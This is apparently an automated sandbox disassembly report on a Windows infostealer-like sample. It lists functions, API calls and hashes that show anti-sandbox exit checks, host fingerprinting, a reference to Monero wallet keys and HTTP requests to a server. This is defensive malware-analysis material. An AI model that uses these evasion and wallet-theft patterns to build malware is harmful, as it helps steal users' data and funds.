                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1069 9617a0-9617cd call 96aad0 StrCmpCA 1072 9617d7-9617f1 call 96aad0 1069->1072 1073 9617cf-9617d1 ExitProcess 1069->1073 1077 9617f4-9617f8 1072->1077 1078 9619c2-9619cd call 96a800 1077->1078 1079 9617fe-961811 1077->1079 1081 961817-96181a 1079->1081 1082 96199e-9619bd 1079->1082 1084 961835-961844 call 96a820 1081->1084 1085 961932-961943 StrCmpCA 1081->1085 1086 961913-961924 StrCmpCA 1081->1086 1087 961970-961981 StrCmpCA 1081->1087 1088 9618f1-961902 StrCmpCA 1081->1088 1089 961951-961962 StrCmpCA 1081->1089 1090 96187f-961890 StrCmpCA 1081->1090 1091 96185d-96186e StrCmpCA 1081->1091 1092 961821-961830 call 96a820 1081->1092 1093 9618cf-9618e0 StrCmpCA 1081->1093 1094 96198f-961999 call 96a820 1081->1094 1095 9618ad-9618be StrCmpCA 1081->1095 1096 961849-961858 call 96a820 1081->1096 1082->1077 1084->1082 1110 961945-961948 1085->1110 1111 96194f 1085->1111 1108 961926-961929 1086->1108 1109 961930 1086->1109 1115 961983-961986 1087->1115 1116 96198d 1087->1116 1106 961904-961907 1088->1106 1107 96190e 1088->1107 1112 961964-961967 1089->1112 1113 96196e 1089->1113 1100 961892-96189c 1090->1100 1101 96189e-9618a1 1090->1101 1098 961870-961873 1091->1098 1099 96187a 1091->1099 1092->1082 1104 9618e2-9618e5 1093->1104 1105 9618ec 1093->1105 1094->1082 1102 9618c0-9618c3 1095->1102 1103 9618ca 1095->1103 1096->1082 1098->1099 1099->1082 1120 9618a8 1100->1120 1101->1120 1102->1103 1103->1082 1104->1105 1105->1082 1106->1107 1107->1082 1108->1109 1109->1082 1110->1111 1111->1082 1112->1113 1113->1082 1115->1116 1116->1082 1120->1082
                    APIs
                    • StrCmpCA.SHLWAPI(00000000,block), ref: 009617C5
                    • ExitProcess.KERNEL32 ref: 009617D1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExitProcess
                    • String ID: block
                    • API String ID: 621844428-2199623458
                    • Opcode ID: b72e88abecc38b3db63a654b82a0df0ac0420bac0804252e0e75dd3dab43d8ae
                    • Instruction ID: d175270ddf9481e4d6c6bd8bc8e63fd549668c414a94d6bab8b9a7cc474a585d
                    • Opcode Fuzzy Hash: b72e88abecc38b3db63a654b82a0df0ac0420bac0804252e0e75dd3dab43d8ae
                    • Instruction Fuzzy Hash: 4F5193B5A04309EFCB04DFA1E994BBE77B5BF84704F188449E406A7341D774E941DB62
                    Function 00967500 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1124 967500-96754a GetWindowsDirectoryA 1125 967553-9675c7 GetVolumeInformationA call 968d00 * 3 1124->1125 1126 96754c 1124->1126 1133 9675d8-9675df 1125->1133 1126->1125 1134 9675e1-9675fa call 968d00 1133->1134 1135 9675fc-967617 GetProcessHeap RtlAllocateHeap 1133->1135 1134->1133 1137 967628-967658 wsprintfA call 96a740 1135->1137 1138 967619-967626 call 96a740 1135->1138 1145 96767e-96768e 1137->1145 1138->1145
                    APIs
                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00967542
                    • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0096757F
                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00967603
                    • RtlAllocateHeap.NTDLL(00000000), ref: 0096760A
                    • wsprintfA.USER32 ref: 00967640
                      • Part of subcall function 0096A740: lstrcpy.KERNEL32(00970E17,00000000), ref: 0096A788
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                    • String ID: :$C$\
                    • API String ID: 1544550907-3809124531
                    • Opcode ID: 4e7d8c20057751b22bd3d69626df1b53f5037082700252a14e203110a289416e
                    • Instruction ID: 9636ca9d245909bd70f7d6c382c3f2f73de895f3dd152f639058e7e4565c616d
                    • Opcode Fuzzy Hash: 4e7d8c20057751b22bd3d69626df1b53f5037082700252a14e203110a289416e
                    • Instruction Fuzzy Hash: AF41A2B1D04248ABDF10DF94DC95BEEBBB8EF58744F100199F50967280DB78AA44CFA6
                    Function 009669F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                      • Part of subcall function 00969860: GetProcAddress.KERNEL32(74DD0000,005B24A0), ref: 009698A1
                      • Part of subcall function 00969860: GetProcAddress.KERNEL32(74DD0000,005B2440), ref: 009698BA
                      • Part of subcall function 00969860: GetProcAddress.KERNEL32(74DD0000,005B2218), ref: 009698D2
                      • Part of subcall function 00969860: GetProcAddress.KERNEL32(74DD0000,005B2458), ref: 009698EA
                      • Part of subcall function 00969860: GetProcAddress.KERNEL32(74DD0000,005B23C8), ref: 00969903
                      • Part of subcall function 00969860: GetProcAddress.KERNEL32(74DD0000,005B8FA8), ref: 0096991B
                      • Part of subcall function 00969860: GetProcAddress.KERNEL32(74DD0000,005A5AD0), ref: 00969933
                      • Part of subcall function 00969860: GetProcAddress.KERNEL32(74DD0000,005A5AF0), ref: 0096994C
                      • Part of subcall function 00969860: GetProcAddress.KERNEL32(74DD0000,005B2350), ref: 00969964
                      • Part of subcall function 00969860: GetProcAddress.KERNEL32(74DD0000,005B2470), ref: 0096997C
                      • Part of subcall function 00969860: GetProcAddress.KERNEL32(74DD0000,005B24D0), ref: 00969995
                      • Part of subcall function 00969860: GetProcAddress.KERNEL32(74DD0000,005B2488), ref: 009699AD
                      • Part of subcall function 00969860: GetProcAddress.KERNEL32(74DD0000,005A5BB0), ref: 009699C5
                      • Part of subcall function 00969860: GetProcAddress.KERNEL32(74DD0000,005B24B8), ref: 009699DE
                      • Part of subcall function 0096A740: lstrcpy.KERNEL32(00970E17,00000000), ref: 0096A788
                      • Part of subcall function 009511D0: ExitProcess.KERNEL32 ref: 00951211
                      • Part of subcall function 00951160: GetSystemInfo.KERNEL32(?), ref: 0095116A
                      • Part of subcall function 00951160: ExitProcess.KERNEL32 ref: 0095117E
                      • Part of subcall function 00951110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0095112B
                      • Part of subcall function 00951110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00951132
                      • Part of subcall function 00951110: ExitProcess.KERNEL32 ref: 00951143
                      • Part of subcall function 00951220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0095123E
                      • Part of subcall function 00951220: __aulldiv.LIBCMT ref: 00951258
                      • Part of subcall function 00951220: __aulldiv.LIBCMT ref: 00951266
                      • Part of subcall function 00951220: ExitProcess.KERNEL32 ref: 00951294
                      • Part of subcall function 00966770: GetUserDefaultLangID.KERNEL32 ref: 00966774
                      • Part of subcall function 00951190: ExitProcess.KERNEL32 ref: 009511C6
                      • Part of subcall function 00967850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009511B7), ref: 00967880
                      • Part of subcall function 00967850: RtlAllocateHeap.NTDLL(00000000), ref: 00967887
                      • Part of subcall function 00967850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0096789F
                      • Part of subcall function 009678E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00967910
                      • Part of subcall function 009678E0: RtlAllocateHeap.NTDLL(00000000), ref: 00967917
                      • Part of subcall function 009678E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0096792F
                      • Part of subcall function 0096A9B0: lstrlen.KERNEL32(?,005B9248,?,\Monero\wallet.keys,00970E17), ref: 0096A9C5
                      • Part of subcall function 0096A9B0: lstrcpy.KERNEL32(00000000), ref: 0096AA04
                      • Part of subcall function 0096A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0096AA12
                      • Part of subcall function 0096A8A0: lstrcpy.KERNEL32(?,00970E17), ref: 0096A905
                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,005B8F78,?,0097110C,?,00000000,?,00971110,?,00000000,00970AEF), ref: 00966ACA
                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00966AE8
                    • CloseHandle.KERNEL32(00000000), ref: 00966AF9
                    • Sleep.KERNEL32(00001770), ref: 00966B04
                    • CloseHandle.KERNEL32(?,00000000,?,005B8F78,?,0097110C,?,00000000,?,00971110,?,00000000,00970AEF), ref: 00966B1A
                    • ExitProcess.KERNEL32 ref: 00966B22
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                    • String ID:
                    • API String ID: 2525456742-0
                    • Opcode ID: b6dd313286719e3d59c247e5ce695b0c4b8432190df1e3ad4e87e0ac8e03028d
                    • Instruction ID: f3b12357c1b4993b3e0005dd02d32d299a10532068754c53f265e4e55694bb0c
                    • Opcode Fuzzy Hash: b6dd313286719e3d59c247e5ce695b0c4b8432190df1e3ad4e87e0ac8e03028d
                    • Instruction Fuzzy Hash: 28310771904208AADB04FBF0DD57BEE7778AF84340F504529F612B7192DF746A05CBA6
                    Function 00951220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1204 951220-951247 call 9689b0 GlobalMemoryStatusEx 1207 951273-95127a 1204->1207 1208 951249-951271 call 96da00 * 2 1204->1208 1210 951281-951285 1207->1210 1208->1210 1212 951287 1210->1212 1213 95129a-95129d 1210->1213 1215 951292-951294 ExitProcess 1212->1215 1216 951289-951290 1212->1216 1216->1213 1216->1215
                    APIs
                    • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0095123E
                    • __aulldiv.LIBCMT ref: 00951258
                    • __aulldiv.LIBCMT ref: 00951266
                    • ExitProcess.KERNEL32 ref: 00951294
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                    • String ID: @
                    • API String ID: 3404098578-2766056989
                    • Opcode ID: 626af16e8ce470b54cc94aa9c3707a51e2af67b9127ce67e42d510c037d14afd
                    • Instruction ID: 47b9067e3c2cb450e04738a03921db52951b70e0a23b318c3c9b0dce98f72a13
                    • Opcode Fuzzy Hash: 626af16e8ce470b54cc94aa9c3707a51e2af67b9127ce67e42d510c037d14afd
                    • Instruction Fuzzy Hash: 04016DB0D44308BBEB10DFE1CC4AB9EBB78AB44706F208049EB15B62C0DB7455858B99
                    Function 00966AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1218 966af3 1219 966b0a 1218->1219 1221 966b0c-966b22 call 966920 call 965b10 CloseHandle ExitProcess 1219->1221 1222 966aba-966ad7 call 96aad0 OpenEventA 1219->1222 1227 966af5-966b04 CloseHandle Sleep 1222->1227 1228 966ad9-966af1 call 96aad0 CreateEventA 1222->1228 1227->1219 1228->1221
                    APIs
                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,005B8F78,?,0097110C,?,00000000,?,00971110,?,00000000,00970AEF), ref: 00966ACA
                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00966AE8
                    • CloseHandle.KERNEL32(00000000), ref: 00966AF9
                    • Sleep.KERNEL32(00001770), ref: 00966B04
                    • CloseHandle.KERNEL32(?,00000000,?,005B8F78,?,0097110C,?,00000000,?,00971110,?,00000000,00970AEF), ref: 00966B1A
                    • ExitProcess.KERNEL32 ref: 00966B22
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                    • String ID:
                    • API String ID: 941982115-0
                    • Opcode ID: e6ce2b0ceda2fe7edf6ef5ea9e398295b69d0944887839fb2bb83a5a15e44747
                    • Instruction ID: 3cfd88e8e5043b92fe2c630332641c824468844aa6677ee974d226137e79585e
                    • Opcode Fuzzy Hash: e6ce2b0ceda2fe7edf6ef5ea9e398295b69d0944887839fb2bb83a5a15e44747
                    • Instruction Fuzzy Hash: 2DF05830A44209EBE710ABF0DD1ABBE7B38EB44741F208916B902A21C1CFB45940DAA6
                    Function 009547B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00954839
                    • InternetCrackUrlA.WININET(00000000,00000000), ref: 00954849
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CrackInternetlstrlen
                    • String ID: <
                    • API String ID: 1274457161-4251816714
                    • Opcode ID: 0e34c59644ad27e57ba0236294af200181d4e851594a8161494d1f73b22a424d
                    • Instruction ID: dd278453efa0de9ec9ccaa00ffbe3ca45f0f472f6ebc05fa508f0312f1c9b488
                    • Opcode Fuzzy Hash: 0e34c59644ad27e57ba0236294af200181d4e851594a8161494d1f73b22a424d
                    • Instruction Fuzzy Hash: 3C212CB1D00209ABDF14DFA4E845BDE7B75EB44320F108626E915A7281EB706A05CF92
                    Function 009651F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                      • Part of subcall function 0096A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0096A7E6
                      • Part of subcall function 00956280: InternetOpenA.WININET(00970DFE,00000001,00000000,00000000,00000000), ref: 009562E1
                      • Part of subcall function 00956280: StrCmpCA.SHLWAPI(?,005BE8F8), ref: 00956303
                      • Part of subcall function 00956280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00956335
                      • Part of subcall function 00956280: HttpOpenRequestA.WININET(00000000,GET,?,005BE380,00000000,00000000,00400100,00000000), ref: 00956385
                      • Part of subcall function 00956280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 009563BF
                      • Part of subcall function 00956280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009563D1
                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00965228
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                    • String ID: ERROR$ERROR
                    • API String ID: 3287882509-2579291623
                    • Opcode ID: 7acab794eea682d570f296e2d5944adf099f0804b47d6f26780ed21d6b14d214
                    • Instruction ID: 225220f5e41e43f56fb8d035980f28cbff1ac5598bcd2cef08c9c8964a560639
                    • Opcode Fuzzy Hash: 7acab794eea682d570f296e2d5944adf099f0804b47d6f26780ed21d6b14d214
                    • Instruction Fuzzy Hash: 0F110330910148A7CB14FF64DD92BED7338AF90340F404555F91A67592EF346B06CB95
                    Function 00951110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                    Download Yara Rule
                    APIs
                    • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0095112B
                    • VirtualAllocExNuma.KERNEL32(00000000), ref: 00951132
                    • ExitProcess.KERNEL32 ref: 00951143
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Process$AllocCurrentExitNumaVirtual
                    • String ID:
                    • API String ID: 1103761159-0
                    • Opcode ID: d03670be5a0e894e0ceeb1583aa3b29b3a09a0901fbcb6d44efbf5c05955dc65
                    • Instruction ID: aa5ba71cebe735f28d197e1ac36d296d6f1930ede380a9630a2703de81239cf9
